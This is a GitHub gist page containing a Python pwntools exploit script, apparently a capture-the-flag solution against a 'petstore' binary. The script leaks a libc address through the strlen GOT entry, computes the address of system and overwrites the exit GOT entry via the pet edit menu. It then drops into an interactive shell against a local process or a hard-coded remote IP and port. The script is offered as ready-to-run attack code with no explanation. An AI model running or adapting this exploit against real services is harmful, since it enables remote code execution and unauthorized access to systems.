Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
exploit petstore
#!/usr/bin/python
from pwn import *
import sys
strlen_got = 0x602040
exit_got = 0x602070
from struct import *
offsets = [
{"printf":0x4f190, "system": 0x3f306}, # local
{"printf": 0x64e80, "system": 0x10a38c}, # remote
]
def create(name, age, ptype="1"):
p.sendline("1")
p.recvuntil("> ")
# set pet type
p.sendline(str(ptype))
# name
p.recvuntil("Name: ")
p.sendline(name)
p.recvuntil("Age: ")
p.sendline(str(age))
def create_dog(name, age):
log.info("Creating a Dog name:{:s} age:{:d}".format(name, age))
create(name, age, 1)
def create_cat(name, age):
log.info("Creating a Cat name:{:s} age:{:d}".format(name, age))
create(name, age, 2)
def show():
p.sendline("3")
return
def sell(index):
log.info("Selling index:{:d}".format(index))
p.sendline(str(2))
p.sendline(str(index))
def edit(index, name, age):
log.info("Editing {:d} name:{:s} age:{:d}".format(index, name, age))
p.sendline("4")
p.recvuntil("Index: ")
p.sendline(str(index))
p.recvuntil("New name: ")
p.sendline(name)
p.recvuntil("New age: ")
p.sendline(str(age))
def do_leak():
bsize = 31
create_cat("A" * bsize, 11)
sell(0)
create_dog("B" * bsize, strlen_got)
def pwn(payload):
bsize = 30
sell(1)
create_dog("c" * bsize, exit_got)
edit(2, p64(exit_got), exit_got)
edit(0, payload, exit_got)
def main(offset_idx):
p.recvuntil("> ")
do_leak()
show()
p.recvuntil("name: ")
leak = u64(p.recv(6).ljust(8, '\x00'))
libc = leak - offsets[offset_idx]["printf"]
system = libc + offsets[offset_idx]["system"]
log.info("Leak: 0x{:x}".format(leak))
log.info("libc: 0x{:x}".format(libc))
log.info("system: 0x{:x}".format(system))
payload = p64(system)[0:6]
log.info("payload size {:d} payload{:s}".format(len(payload), payload))
pwn(payload)
p.interactive()
if __name__ == "__main__":
if len(sys.argv) > 1:
log.info("Buckle your seat belt, Dorothy, 'cause Kansas is going bye-bye")
p = remote("68.183.107.160", 1338)
main(1)
else:
log.info("Local....")
p = process("./petstore")
main(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.